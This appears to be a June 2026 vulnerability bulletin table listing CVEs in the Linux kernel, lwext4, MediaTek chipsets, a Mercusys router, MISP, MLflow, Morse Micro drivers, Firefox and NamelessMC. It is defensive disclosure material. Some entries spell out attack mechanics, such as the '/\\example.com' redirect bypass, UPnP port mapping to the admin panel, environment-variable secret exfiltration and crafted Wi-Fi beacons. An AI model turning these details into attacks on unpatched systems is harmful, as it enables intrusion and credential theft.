| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: fsl_xcvr: Revert fix missing lock in fsl_xcvr_mode_put() This reverts commit f51424872760 ("ASoC: fsl_xcvr: fix missing lock in fsl_xcvr_mode_put()"). The original patch attempted to acquire the card->controls_rwsem lock in fsl_xcvr_mode_put(). However, this function is called from the upper ALSA core function snd_ctl_elem_write(), which already holds the write lock on controls_rwsem for the whole put operation. So there is no need to simply hold the lock for fsl_xcvr_activate_ctl() again. Acquiring the read lock while holding the write lock in the same thread results in a deadlock and a hung task, as reported by Alexander Stein. | 2026-06-03 | not yet calculated | CVE-2026-46262 | https://git.kernel.org/stable/c/ae5a70e3e87c28edbaf9939cfef1bcbd9615420f https://git.kernel.org/stable/c/30ffcad5edb56947dccc26f6816ab7a55b21a711 https://git.kernel.org/stable/c/29b2fbe3498da3681a01b34e4a2259f8a1b89448 https://git.kernel.org/stable/c/b0f74f5d24fe3c73ef1369a811891198b54c1e8e https://git.kernel.org/stable/c/9a2a5da002775376498e8814df4a87cd629a3a0c https://git.kernel.org/stable/c/0886dc6326c3cc596799c4340d342898301cf52a https://git.kernel.org/stable/c/9f16d96e1222391a6b996a1b676bec14fb91e3b2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nfc: hci: shdlc: Stop timers and work before freeing context llc_shdlc_deinit() purges SHDLC skb queues and frees the llc_shdlc structure while its timers and state machine work may still be active. Timer callbacks can schedule sm_work, and sm_work accesses SHDLC state and the skb queues. If teardown happens in parallel with a queued/running work item, it can lead to UAF and other shutdown races. Stop all SHDLC timers and cancel sm_work synchronously before purging the queues and freeing the context. Found by Linux Verification Center (linuxtesting.org) with SVACE. | 2026-06-03 | not yet calculated | CVE-2026-46267 | https://git.kernel.org/stable/c/c60f41022eaad2a1dafecd3ae6f249a3bd6d4b6e https://git.kernel.org/stable/c/a24a676329d40481b2331bfa1418a679577dfd3a https://git.kernel.org/stable/c/77eef9f2eef045c3c37a3df82d3e661afb866b98 https://git.kernel.org/stable/c/cf70cedce327833296ebe6043364d1e44b76a2ab https://git.kernel.org/stable/c/276820278e9717cc7d4bb32381892dd3ddf418d4 https://git.kernel.org/stable/c/1cb97b1225450af3f7b728777929ba50c6a58ced https://git.kernel.org/stable/c/c9efde1e537baed7648a94022b43836a348a074f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: PCI/P2PDMA: Fix p2pmem_alloc_mmap() warning condition Commit b7e282378773 has already changed the initial page refcount of p2pdma page from one to zero, however, in p2pmem_alloc_mmap() it uses "VM_WARN_ON_ONCE_PAGE(!page_ref_count(page))" to assert the initial page refcount should not be zero and the following will be reported when CONFIG_DEBUG_VM is enabled: page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x380400000 flags: 0x20000000002000(reserved|node=0|zone=4) raw: 0020000000002000 ff1100015e3ab440 0000000000000000 0000000000000000 raw: 0000000000000000 0000000000000000 00000000ffffffff 0000000000000000 page dumped because: VM_WARN_ON_ONCE_PAGE(!page_ref_count(page)) ------------[ cut here ]------------ WARNING: CPU: 5 PID: 449 at drivers/pci/p2pdma.c:240 p2pmem_alloc_mmap+0x83a/0xa60 Fix by using "page_ref_count(page)" as the assertion condition. | 2026-06-03 | not yet calculated | CVE-2026-46268 | https://git.kernel.org/stable/c/eb9aa9f8010465d927864f5a35bdc5604b0ff51a https://git.kernel.org/stable/c/9b69243983fb2f4d4d1f4ef0989bc1296547dc2c https://git.kernel.org/stable/c/cb500023a75246f60b79af9f7321d6e75330c5b5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pinctrl: canaan: k230: Fix NULL pointer dereference when parsing devicetree When probing the k230 pinctrl driver, the kernel triggers a NULL pointer dereference. The crash trace showed: [ 0.732084] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000068 [ 0.740737] ... [ 0.776296] epc : k230_pinctrl_probe+0x1be/0x4fc In k230_pinctrl_parse_functions(), we attempt to retrieve the device pointer via info->pctl_dev->dev, but info->pctl_dev is only initialized after k230_pinctrl_parse_dt() completes. At the time of DT parsing, info->pctl_dev is still NULL, leading to the invalid dereference of info->pctl_dev->dev. Use the already available device pointer from platform_device instead of accessing through uninitialized pctl_dev. | 2026-06-03 | not yet calculated | CVE-2026-46269 | https://git.kernel.org/stable/c/3c7d637bfc3dfbd6471c68bd767f7eb8b5b09eba https://git.kernel.org/stable/c/1d0d361f4dbc2bb2003594f84e4b101fc6b508c0 https://git.kernel.org/stable/c/d8c128fb6c2277d95f3f6a4ce28b82c8370031f6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: coresight: tmc-etr: Fix race condition between sysfs and perf mode When trying to run perf and sysfs mode simultaneously, the WARN_ON() in tmc_etr_enable_hw() is triggered sometimes: WARNING: CPU: 42 PID: 3911571 at drivers/hwtracing/coresight/coresight-tmc-etr.c:1060 tmc_etr_enable_hw+0xc0/0xd8 [coresight_tmc] [..snip..] Call trace: tmc_etr_enable_hw+0xc0/0xd8 [coresight_tmc] (P) tmc_enable_etr_sink+0x11c/0x250 [coresight_tmc] (L) tmc_enable_etr_sink+0x11c/0x250 [coresight_tmc] coresight_enable_path+0x1c8/0x218 [coresight] coresight_enable_sysfs+0xa4/0x228 [coresight] enable_source_store+0x58/0xa8 [coresight] dev_attr_store+0x20/0x40 sysfs_kf_write+0x4c/0x68 kernfs_fop_write_iter+0x120/0x1b8 vfs_write+0x2c8/0x388 ksys_write+0x74/0x108 __arm64_sys_write+0x24/0x38 el0_svc_common.constprop.0+0x64/0x148 do_el0_svc+0x24/0x38 el0_svc+0x3c/0x130 el0t_64_sync_handler+0xc8/0xd0 el0t_64_sync+0x1ac/0x1b0 ---[ end trace 0000000000000000 ]--- Since the enablement of sysfs mode is separeted into two critical regions, one for sysfs buffer allocation and another for hardware enablement, it's possible to race with the perf mode. Fix this by double check whether the perf mode's been used before enabling the hardware in sysfs mode. mode: [sysfs mode] [perf mode] tmc_etr_get_sysfs_buffer() spin_lock(&drvdata->spinlock) [sysfs buffer allocation] spin_unlock(&drvdata->spinlock) spin_lock(&drvdata->spinlock) tmc_etr_enable_hw() drvdata->etr_buf = etr_perf->etr_buf spin_unlock(&drvdata->spinlock) spin_lock(&drvdata->spinlock) tmc_etr_enable_hw() WARN_ON(drvdata->etr_buf) // WARN sicne etr_buf initialized at the perf side spin_unlock(&drvdata->spinlock) With this fix, we retain the check for CS_MODE_PERF in get_etr_sysfs_buf. This ensures we verify whether the perf mode's already running before we actually allocate the buffer. Then we can save the time of allocating/freeing the sysfs buffer if race with the perf mode. | 2026-06-03 | not yet calculated | CVE-2026-46272 | https://git.kernel.org/stable/c/38a07194bbcddb18d77dad40ba9978d994c0b74c https://git.kernel.org/stable/c/6906aa70d4fc5900b954136e20e27c2be6d1acab https://git.kernel.org/stable/c/e6e43e82c79c97917cbe356c07e8a6f3f982ab53 |
| lwekt4--lwekt4 | A divide-by-zero vulnerability in the ext4_block_set_lb_size function in src/ext4_blockdev.c of the lwext4 1.0.0 library allows attackers to cause a denial of service by providing a malformed ext4 filesystem image that results in a zero logical block size. The vulnerability is triggered during mount or image processing and leads to a Floating-Point Exception (FPE) under sanitizers or a runtime crash in standard builds due to missing validation of lb_size. | 2026-06-03 | not yet calculated | CVE-2025-70100 | https://github.com/gkostka/lwext4/issues/90 https://github.com/sigdevel/pocs/blob/main/res/lwext4/2/sig8_2_lwext4_ext4_blockdev_c_127 https://infosec.exchange/@sigdevel/116668952003072580 |
| lwext4--lwekt4 | An out-of-bounds read in the ext4_ext_binsearch_idx function in src/ext4_extent.c of the lwext4 1.0.0 library allows attackers to cause a denial of service by supplying a specially crafted ext4 filesystem image. The vulnerability occurs due to insufficient validation of extent header fields before performing a binary search over extent index entries, which can result in invalid pointer calculations and an out-of-bounds memory read during extent tree traversal. | 2026-06-03 | not yet calculated | CVE-2025-70101 | https://github.com/gkostka/lwext4/issues/91 https://github.com/sigdevel/pocs/blob/main/res/lwext4/3/sig11_lwext4_ext4_extent_815 https://infosec.exchange/@sigdevel/116668958927817708 |
| lwext4--lwext4 | A NULL pointer dereference in the ext4_dir_en_get_name_len function in include/ext4_dir.h of lwext4 1.0.0 allows attackers to cause a denial of service by supplying a specially crafted EXT4 filesystem image with malformed directory entries. During directory iteration, the code may fail to validate the directory entry pointer before accessing the name_len field, resulting in a segmentation fault. This affects versions based on (or equivalent to) the 2016-era codebase (1.0.0). | 2026-06-01 | not yet calculated | CVE-2025-70099 | https://github.com/gkostka/lwext4/issues/89 https://github.com/sigdevel/pocs/blob/main/res/lwext4/1/sig11_2_1_lwext4_ext4_dir_h_126 https://infosec.exchange/@sigdevel/116668939725424227 |
| MaxSite--CMS v.109.2 | Cross Site Scripting vulnerability in MaxSite CMS v.109.2 allows a remote attacker to obtain sensitive information via the Backend page file upload endpoint used by admin_page | 2026-06-03 | not yet calculated | CVE-2026-37700 | http://maxsite.com https://github.com/PureStream108/CVE/blob/main/MaxSite109.2/about_en.md |
| MediaTek, Inc.--MediaTek chipset | In wlan AP driver, there is a possible memory corruption due to a heap buffer overflow. This could lead to remote (proximal/adjacent) code execution with User execution privileges needed. User interaction is not needed for exploitation. Patch ID: WCNCR00480138; Issue ID: MSV-6295. | 2026-06-01 | not yet calculated | CVE-2026-20452 | https://corp.mediatek.com/product-security-bulletin/June-2026 |
| MediaTek, Inc.--MediaTek chipset | In geniezone, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10886526; Issue ID: MSV-6791. | 2026-06-01 | not yet calculated | CVE-2026-20453 | https://corp.mediatek.com/product-security-bulletin/June-2026 |
| MediaTek, Inc.--MediaTek chipset | In geniezone, there is a possible out of bounds write due to a race condition. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10873936; Issue ID: MSV-6786. | 2026-06-01 | not yet calculated | CVE-2026-20454 | https://corp.mediatek.com/product-security-bulletin/June-2026 |
| MediaTek, Inc.--MediaTek chipset | In geniezone, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10873936; Issue ID: MSV-6784. | 2026-06-01 | not yet calculated | CVE-2026-20455 | https://corp.mediatek.com/product-security-bulletin/June-2026 |
| MediaTek, Inc.--MediaTek chipset | In wlan STA driver, there is a possible system crash due to a missing bounds check. This could lead to local denial of service with User execution privileges needed. User interaction is not needed for exploitation. Patch ID: WCNCR00480851; Issue ID: MSV-6338. | 2026-06-01 | not yet calculated | CVE-2026-20456 | https://corp.mediatek.com/product-security-bulletin/June-2026 |
| Memos--Memos v.0.26.0 | Cross Site Scripting vulnerability in usememos Memos v.0.26.0 allows a remote attacker to obtain sensitive information via the SANITIZE_SCHEMA, Memo Rendering Component, and Public/Private Memo View pages | 2026-06-02 | not yet calculated | CVE-2026-30586 | https://github.com/usememos/memos/blob/e1c8101d29ccf382c07673934e1d9a311480c25a/web/src/components/MemoContent/constants.ts#L30 https://gist.github.com/gabdevele/1dd393955d3ca7d937776fdca9412f0c |
| Mercusys--AC12G | Mercusys AC12G (EU) V1 router with firmware AC12G(EU)_V1_200909 exposes 15 of 18 UPnP IGD actions without authentication on port 1900, including AddPortMapping and GetExternalIPAddress. UPnP is enabled by default through the admin interface, allowing any unauthenticated LAN device to create arbitrary port forwarding rules and access WAN traffic statistics. | 2026-06-03 | not yet calculated | CVE-2026-36603 | https://github.com/Tymbark7372/MERCUSYS-AC12G/blob/master/advisories/CVE-2026-36603.md |
| Mercusys--AC12G | Mercusys AC12G (EU) V1 router with firmware AC12G(EU)_V1_200909 does not validate the HTTP Host header, enabling DNS rebinding attacks. An external attacker can rebind a domain to the router's internal IP address, extending the CORS wildcard vulnerability (Access-Control-Allow-Origin: *) to internet-originated attacks. | 2026-06-03 | not yet calculated | CVE-2026-36604 | https://github.com/Tymbark7372/MERCUSYS-AC12G/blob/master/advisories/CVE-2026-36604.md |
| Mercusys--AC12G | Mercusys AC12G (EU) V1 router with firmware AC12G(EU)_V1_200909 is vulnerable to a HTTP denial of service via a low number of crafted incomplete HTTP requests, causing a persistent crash that requires physical power cycling to recover. | 2026-06-03 | not yet calculated | CVE-2026-36605 | https://github.com/Tymbark7372/MERCUSYS-AC12G/blob/master/advisories/CVE-2026-36605.md |
| Mercusys--AC12G | Mercusys AC12G (EU) V1 router with firmware AC12G(EU)_V1_200909 encrypts configuration backups with a hardcoded DES key using single DES in ECB mode. An attacker who obtains a backup file can decrypt it to recover all stored credentials including admin password, WiFi PSK, and DDNS credentials. | 2026-06-03 | not yet calculated | CVE-2026-36606 | https://github.com/Tymbark7372/MERCUSYS-AC12G/blob/master/advisories/CVE-2026-36606.md |
| Mercusys--AC12G | Mercusys AC12G (EU) V1 router with firmware AC12G(EU)_V1_200909 allows unauthenticated brute-force attacks via the TDDP password change endpoint (code=10), which lacks the rate limiting applied to the login endpoint (code=7). An attacker on the adjacent network can attempt unlimited passwords without triggering account lockout. | 2026-06-03 | not yet calculated | CVE-2026-36607 | https://github.com/Tymbark7372/MERCUSYS-AC12G/blob/master/advisories/CVE-2026-36607.md |
| Mercusys--AC12G | Mercusys AC12G (EU) V1 router with firmware AC12G(EU)_V1_200909 allows UPnP AddPortMapping to forward external ports to the router's own admin interface by accepting its own IP (192.168.1.1) or localhost (127.0.0.1) as InternalClient. An unauthenticated LAN attacker can expose the admin panel to the internet with a single SOAP request. | 2026-06-03 | not yet calculated | CVE-2026-36608 | https://github.com/Tymbark7372/MERCUSYS-AC12G/blob/master/advisories/CVE-2026-36608.md |
| Mercusys--AC12G | Mercusys AC12G (EU) V1 router with firmware AC12G(EU)_V1_200909 uses a static authentication nonce that does not change between requests from the same source IP. Combined with the predictable XOR-based password encoding (securityEncode function), this allows an attacker to reverse captured authentication tokens to recover the plaintext password. | 2026-06-03 | not yet calculated | CVE-2026-36609 | https://github.com/Tymbark7372/MERCUSYS-AC12G/blob/master/advisories/CVE-2026-36609.md |
| Mercusys--AC12G | Mercusys AC12G (EU) V1 with firmware AC12G(EU)_V1_200909 transmits DDNS credentials over plaintext HTTP with only Base64 encoding. The firmware contains no TLS implementation, allowing man-in-the-middle interception of DDNS service credentials. | 2026-06-03 | not yet calculated | CVE-2026-36610 | https://github.com/Tymbark7372/MERCUSYS-AC12G/blob/master/advisories/CVE-2026-36610.md |
| Mercusys--AC12G | Mercusys AC12G (EU) V1 with firmware AC12G(EU)_V1_200909 returns 128 bytes of uninitialized buffer when receiving POST requests without SOAPAction header on UPnP port 1900, exposing internal memory to unauthenticated adjacent network attackers. | 2026-06-03 | not yet calculated | CVE-2026-36611 | https://github.com/Tymbark7372/MERCUSYS-AC12G/blob/master/advisories/CVE-2026-36611.md |
| Mercusys--AC12G | Mercusys AC12G (EU) V1 with firmware AC12G(EU)_V1_200909 enables WPS 2.0 by default with a weak lockout policy (60-second lockout after 10 attempts). | 2026-06-03 | not yet calculated | CVE-2026-36612 | https://github.com/Tymbark7372/MERCUSYS-AC12G/blob/master/advisories/CVE-2026-36612.md |
| Mercusys--AC12G | Mercusys AC12G (EU) V1 with firmware AC12G(EU)_V1_200909 returns 128 bytes of uninitialized internal buffer contents when receiving HTTP POST requests to undefined paths, exposing server state to unauthenticated adjacent network attackers. | 2026-06-03 | not yet calculated | CVE-2026-36613 | https://github.com/Tymbark7372/MERCUSYS-AC12G/blob/master/advisories/CVE-2026-36613.md |
| Mercusys--AC12G | Mercusys AC12G (EU) V1 with firmware AC12G(EU)_V1_200909 exposes an undocumented /agileconfigreset endpoint that returns internal buffer contents to unauthenticated attackers on the adjacent network. | 2026-06-03 | not yet calculated | CVE-2026-36615 | https://github.com/Tymbark7372/MERCUSYS-AC12G/blob/master/advisories/CVE-2026-36615.md |
| Mercusys--AC12G | Mercusys AC12G (EU) V1 with firmware AC12G(EU)_V1_200909 contains hardcoded WiFi driver credentials including a RADIUS shared secret, WPS test key, and default PSK embedded in the production firmware binary. | 2026-06-03 | not yet calculated | CVE-2026-36616 | https://github.com/Tymbark7372/MERCUSYS-AC12G/blob/master/advisories/CVE-2026-36616.md |
| Mercusys--AC12G | Mercusys AC12G (EU) V1 with firmware AC12G(EU)_V1_200909 responds to version.bind CHAOS TXT queries, disclosing the DNS resolver software version (unbound 1.22.0), aiding targeted attacks against known vulnerabilities. | 2026-06-03 | not yet calculated | CVE-2026-36618 | https://github.com/Tymbark7372/MERCUSYS-AC12G/blob/master/advisories/CVE-2026-36618.md |
| Mercusys--AC12G | Mercusys AC12G (EU) V1 router with firmware AC12G(EU)_V1_200909 discloses kernel memory layout via the UPnP GetStatusInfo action. An unauthenticated attacker on the adjacent network can obtain a raw MIPS KSEG0 kernel pointer, revealing kernel memory layout and aiding further exploitation. | 2026-06-03 | not yet calculated | CVE-2026-36602 | https://github.com/Tymbark7372/MERCUSYS-AC12G/blob/master/advisories/CVE-2026-36602.md |
| misp--misp | An authentication bypass vulnerability exists in MISP when LDAP mixed authentication is enabled with OTP enforcement. In deployments configured with LdapAuth.mixedAuth=true and Security.require_otp=true, users authenticated through an authentication plugin, such as LDAP, may have their authenticated session established during the application beforeFilter phase before the normal login flow enforces the OTP challenge. As a result, an attacker with valid primary authentication credentials could bypass the required OTP step by authenticating through the plugin-backed login flow and then directly accessing another application URL instead of completing the OTP verification page. This allows access to the application as the affected user without providing a valid TOTP, HOTP, or email OTP code. The issue affects configurations where plugin-based authentication is enabled and OTP is expected to be mandatory. The fix ensures that OTP requirements are checked immediately after plugin authentication and before the user session is established, redirecting users to the appropriate OTP challenge when required. | 2026-06-02 | not yet calculated | CVE-2026-10611 | https://github.com/MISP/MISP/commit/39b3cb15aac4318afdd2ab63b96c2eac12b271fe |
| misp--misp | A visibility control issue in the event template creation workflow allowed non-site-admin users to access private galaxies belonging to other organisations. The event template builder loaded all enabled galaxies without applying organisation or distribution-based access restrictions, potentially exposing private galaxy metadata such as galaxy type and description to users who should not have visibility. The issue has been fixed by restricting galaxy queries for non-site-admin users to galaxies owned by the user's organisation or galaxies with a non-private distribution setting. Site administrators retain visibility of all enabled galaxies. | 2026-06-04 | not yet calculated | CVE-2026-10854 | https://github.com/MISP/MISP/commit/d3adfe1a097dd4b403364e9af34e208660eeec1a |
| misp--misp | An authorization flaw existed in the MISP Event Template Importer overwrite workflow. When importing an event template in overwrite mode, the application checked whether a matching template already existed but did not verify that the importing user belonged to the organization that owned the existing template. As a result, an authenticated user with access to the template import functionality could forcibly overwrite an event template owned by another organization. Successful exploitation could allow unauthorized modification of another organization's event template, potentially altering template structure, attributes, or metadata used for subsequent event creation or sharing workflows. Site administrators are not affected by this restriction, as they are explicitly allowed to overwrite templates across organizations. The issue was fixed by enforcing an ownership check before overwrite: non-site-admin users may only overwrite templates owned by their own organization. | 2026-06-04 | not yet calculated | CVE-2026-10855 | https://github.com/MISP/MISP/commit/7c2200d143bef86aaf58d701b6968a843097db69 |
| misp--misp | A URL validation flaw in the MISP dashboard button widget allowed a crafted relative-looking URL to be accepted as a local path while being interpreted by browsers as an external URL. The validation rejected URLs containing an explicit scheme, host, or user component, but did not reject paths beginning with a slash followed by a backslash, such as /\example.com. Some browsers normalize backslashes in URLs as forward slashes, which can turn this into a scheme-relative external navigation target. In addition, the generated href concatenated the reconstructed URL with the original URL, increasing the possibility of unsafe or malformed link generation. An attacker able to configure or influence a dashboard button URL could craft a button that appears to point inside the application but redirects users to an attacker-controlled site when clicked. This could be used for phishing, credential theft, or social engineering. The patch fixes the issue by rejecting empty paths and paths starting with /\, and by emitting only the reconstructed validated URL in the anchor href. | 2026-06-04 | not yet calculated | CVE-2026-10856 | https://github.com/MISP/MISP/commit/f879f16fb5db7a9aab0a70fdcafea12ce4847e9a |
| misp--misp | A logic error in the MISP CRUD component delete handler allowed validation failures to be bypassed when requests used the HTTP DELETE method. Due to missing parentheses in the delete condition, the expression was evaluated as ($validationError === null && POST) || DELETE, meaning a DELETE request could proceed even when the delete validation callback had rejected the operation. An authenticated attacker with access to an affected delete endpoint could abuse this flaw to delete records that should have been protected by application-level validation or authorization checks. | 2026-06-04 | not yet calculated | CVE-2026-10860 | https://github.com/MISP/MISP/commit/a5877559dc88ad7a0c935910a652c130489ae2bd |
| misp--misp | An open redirect vulnerability existed in MISP UsersController::routeafterlogin() because the value stored in the pre_login_requested_url session key was used as the post-login redirect destination without sufficiently enforcing that it was a local application path. An unauthenticated remote attacker could craft a link that causes a victim to visit a trusted MISP instance and, after successful authentication, be redirected to an attacker-controlled external URL. This could be abused to increase the credibility of phishing attacks, redirect users to counterfeit login pages, or deliver attacker-controlled content from an untrusted domain. CWE-601 describes this weakness as accepting user-controlled input that specifies an external link and using it in a redirect, with phishing as a common consequence. The patch mitigates the issue by decoding and parsing the URL, rejecting URLs with a scheme, host, user component, missing or non-local path, and protocol-relative forms such as //example.com and /\example.com. | 2026-06-04 | not yet calculated | CVE-2026-10861 | https://github.com/MISP/MISP/commit/ae760b7bf534f2798810d59a1f961b31adb3443e |
| misp--misp | A security issue was fixed in the correlations over-correlation endpoint where the order query parameter was accepted from user-controlled named request parameters. This allowed an authenticated user to override the server-defined ordering of over-correlating values. Depending on how the value was processed by the underlying data access layer, this could allow manipulation of database query ordering and potentially expose the application to unsafe query construction. The patch removes order from the set of request-controlled parameters and instead sets the ordering server-side to occurrence desc after processing allowed user parameters. Affected component: app/Controller/CorrelationsController.php, overCorrelations() Security impact: An authenticated attacker could influence the ordering clause used by the over-correlations query. The direct impact appears limited to query manipulation unless further evidence confirms SQL injection or unauthorized data exposure through the manipulated ordering expression. | 2026-06-04 | not yet calculated | CVE-2026-10863 | https://github.com/MISP/MISP/commit/aa094a335ba2855f8a42a1dc44398f43560fe247 |
| misp--misp | A vulnerability in the MISP dashboard widgets allowed an authenticated user to manipulate the fields option and influence which fields were returned by the New Users and New Organisations widgets. In some cases, requesting a field set that became empty after validation or redaction could cause the underlying query to fall back to returning unintended model fields. For the New Users widget, this could allow a non-site-admin user to obtain user e-mail addresses even when user e-mail disclosure was disabled by configuration. For the New Organisations widget, crafted field selection could similarly result in unintended organisation fields being included in the dashboard response. The issue was caused by applying field filtering and redaction in a way that could leave the selected field list empty. The patch ensures that the allowed field list is built safely, that restricted fields such as user e-mail addresses are removed before user-supplied field selection is processed, and that an empty field selection falls back only to the permitted default fields. Impact: An authenticated low-privileged user with access to the affected dashboard widgets may be able to disclose restricted user or organisation metadata, including user e-mail addresses depending on configuration. | 2026-06-04 | not yet calculated | CVE-2026-10864 | https://github.com/MISP/MISP/commit/8722fda035b5b622de387ae1dd0159d71ff1e22e |
| misp--misp | A mass assignment vulnerability exists in the MISP user edit functionality due to insufficient filtering of user-supplied fields in UsersController::edit(). When processing edit requests, the application accepted a user-controlled User.id value from request data. An authenticated attacker could craft a modified request containing another user identifier, potentially causing updates to be applied to an unintended user account. Depending on the editable fields and the attacker's privileges, this could allow unauthorized modification of user account attributes and impact account integrity. The issue was addressed by explicitly removing the User.id field from request data before processing the user edit operation. | 2026-06-04 | not yet calculated | CVE-2026-10868 | https://github.com/MISP/MISP/commit/1be8c413b7104a889dfd30c5b1986e3ab17238e8 |
| mlflow--mlflow/mlflow | MLflow 3.9.0 with basic-auth (`--app-name basic-auth`) fails to enforce authorization checks for multiple Gateway API 'list' endpoints. Specifically, the `BEFORE_REQUEST_HANDLERS` dictionary in `mlflow/server/auth/__init__.py` does not include entries for `ListGatewaySecretInfos`, `ListGatewayEndpoints`, and `ListGatewayModelDefinitions`. This allows any authenticated user, regardless of their assigned permissions, to enumerate all gateway secrets, endpoints, and model definitions. This vulnerability exposes sensitive information, such as API keys, endpoint configurations, and proprietary model definitions, to unauthorized users. | 2026-06-02 | not yet calculated | CVE-2026-3198 | https://huntr.com/bounties/e57db731-97d3-40c3-a429-831ee959807f |
| mlflow--mlflow/mlflow | A vulnerability in mlflow/mlflow versions prior to 3.11.0 allows for the resolution of environment variables in AI Gateway secrets, which can be exploited to exfiltrate sensitive server-side environment credentials to an attacker-controlled endpoint. This issue arises because the `api_key` field in gateway secrets can accept `$ENV_VAR` references, which are resolved against the MLflow server's environment during runtime. The resolved secrets are then sent in provider authentication headers to the configured upstream `api_base`. This vulnerability can be exploited by low-privileged authenticated users in basic-auth deployments or by unauthenticated users in default deployments without `basic-auth`. The impact includes potential leakage of sensitive credentials such as cloud artifact credentials (`AWS_ACCESS_KEY_ID`, `AWS_SECRET_ACCESS_KEY`), which could lead to artifact poisoning and cross-boundary code execution in downstream environments. The issue is fixed in version 3.11.0. | 2026-06-03 | not yet calculated | CVE-2026-4035 | https://huntr.com/bounties/f8e591a0-0f19-4910-b82e-16c9956f2233 https://github.com/mlflow/mlflow/commit/4a3f2f720cb4f058c9e0c5b883e0acc9ab64a7f3 |
| Morse Micro--HaLowLink 2 | A heap-based buffer overflow vulnerability in the dot11ah.ko HaLow Wi-Fi kernel driver in Morse Micro HaLowLink 2 software versions prior to 2.11.13 allows an unauthenticated attacker within radio range to cause a Denial of Service (kernel panic) or potentially achieve Remote Code Execution via a crafted 802.11ah beacon or probe response frame containing a malformed S1G Capabilities Information Element (IE element ID 0xD9). The function morse_dot11ah_find_s1g_caps_for_bssid() uses the IE length field directly as the size argument to memcpy without validating it against the 15-byte destination buffer. An attacker can supply up to 255 bytes, causing an overflow of up to 240 bytes of attacker-controlled data into adjacent kernel heap memory. The vulnerability is triggerable during normal scanning without authentication, association, or user interaction. | 2026-06-05 | not yet calculated | CVE-2026-7762 | https://www.morsemicro.com/security-advisories/MM-SA-2026-002 |
| Morse Micro--HaLowLink 2 | A heap-based buffer overflow vulnerability in the morse.ko HaLow Wi-Fi kernel driver in Morse Micro HaLowLink 2 software versions prior to 2.11.13 allows an unauthenticated attacker within radio range to cause a Denial of Service (kernel panic) or potentially achieve Remote Code Execution via a crafted 802.11ah beacon frame containing a malformed Traffic Indication Map (TIM) Information Element. The function morse_page_slicing_process_tim_element() in page_slicing.c derives the TIM bitmap length directly from a received IE field without validating it against the fixed-size destination buffer before passing it to memset and memcpy operations, allowing up to 252 bytes of attacker-controlled data to be written beyond the buffer boundary. Because beacons are broadcast frames processed during passive scanning, no authentication, association, or user interaction is required. | 2026-06-05 | not yet calculated | CVE-2026-7763 | https://www.morsemicro.com/security-advisories/MM-SA-2026-001 |
| Morse Micro--HaLowLink 2 | An out-of-bounds read vulnerability in the morse.ko HaLow Wi-Fi kernel driver in Morse Micro HaLowLink 2 software versions prior to 2.11.12 allows an unauthenticated attacker within radio range to disclose a small amount of kernel heap memory or cause a Denial of Service (kernel oops/panic) via a crafted 802.11ah beacon or probe response frame containing a malformed Vendor Information Element. The function morse_vendor_find_vendor_ie() does not validate the IE length against the expected structure size before its result is passed to morse_vendor_rx_caps_ops_ie() and morse_vendor_fill_sta_vendor_info(), which read at fixed offsets into the IE data. Because the length check only requires the IE to be longer than 3 bytes, an attacker can supply an undersized IE, causing a heap out-of-bounds read of up to 9 bytes. No authentication, association, or user interaction is required. | 2026-06-04 | not yet calculated | CVE-2026-7764 | https://www.morsemicro.com/security-advisories/MM-SA-2026-003 |
| Mozilla--Firefox | Incorrect boundary conditions in the Graphics: Text component. This vulnerability was fixed in Firefox 151.0.3. | 2026-06-02 | not yet calculated | CVE-2026-10701 | https://bugzilla.mozilla.org/show_bug.cgi?id=2038537 https://www.mozilla.org/security/advisories/mfsa2026-54/ |
| Mozilla--Firefox | JIT miscompilation in the JavaScript Engine: JIT component. This vulnerability was fixed in Firefox 151.0.3. | 2026-06-02 | not yet calculated | CVE-2026-10702 | https://bugzilla.mozilla.org/show_bug.cgi?id=2040903 https://www.mozilla.org/security/advisories/mfsa2026-54/ |
| Mozilla--Firefox for iOS | Firefox for iOS Reader View replaced page content in its HTML template before replacing other internal placeholders. A malicious page could include a placeholder string that was later substituted with JSON-LD data, potentially resulting in arbitrary JavaScript execution. This vulnerability was fixed in Firefox for iOS 151.2. | 2026-06-01 | not yet calculated | CVE-2026-9308 | https://bugzilla.mozilla.org/show_bug.cgi?id=2039422 https://www.mozilla.org/security/advisories/mfsa2026-53/ |
| Mozilla--Firefox for iOS | Firefox for iOS Reader View did not properly escape HTML tags in JSON-LD metadata. A malicious page could inject markup that changed Reader View behavior and leaked sensitive URL parameters. These parameters could then be used to access internal pages, potentially resulting in arbitrary JavaScript execution in an internal origin. This vulnerability was fixed in Firefox for iOS 151.2. | 2026-06-01 | not yet calculated | CVE-2026-9309 | https://bugzilla.mozilla.org/show_bug.cgi?id=2036573 https://www.mozilla.org/security/advisories/mfsa2026-53/ |
| NamelessMC--Nameless | NamelessMC is website software for Minecraft servers. In version 2.2.4, `modules/Forum/pages/forum/get_quotes.php` only checks whether the caller is logged in, then reads a post by attacker-controlled `post` ID and returns its content. The backend helper in `modules/Forum/classes/Forum.php` does not enforce forum or topic ACLs. In contrast, the normal topic page in `modules/Forum/pages/forum/view_topic.php` enforces forum visibility and `view_other_topics`. Any low-privileged authenticated user can enumerate post IDs and read content from hidden, private, or staff-only forums. Version 2.2.5 fixes the issue. | 2026-06-02 | not yet calculated | CVE-2026-33398 | https://github.com/NamelessMC/Nameless/security/advisories/GHSA-2r6x-cv4f-h8fx |
| NamelessMC--Nameless | NamelessMC is website software for Minecraft servers. In version 2.2.4, `modules/Forum/classes/ForumPostReactionContext.php` only verifies that the caller can view the forum, but it does not re-enforce topic-level `view_other_topics` authorization. As a result, in forums where users may enter the forum but may only view their own topics, reactions can still be read and modified on other users' topics. Version 2.2.5 fixes the issue. | 2026-06-02 | not yet calculated | CVE-2026-35443 | https://github.com/NamelessMC/Nameless/security/advisories/GHSA-wcrf-5gcp-pf64 |
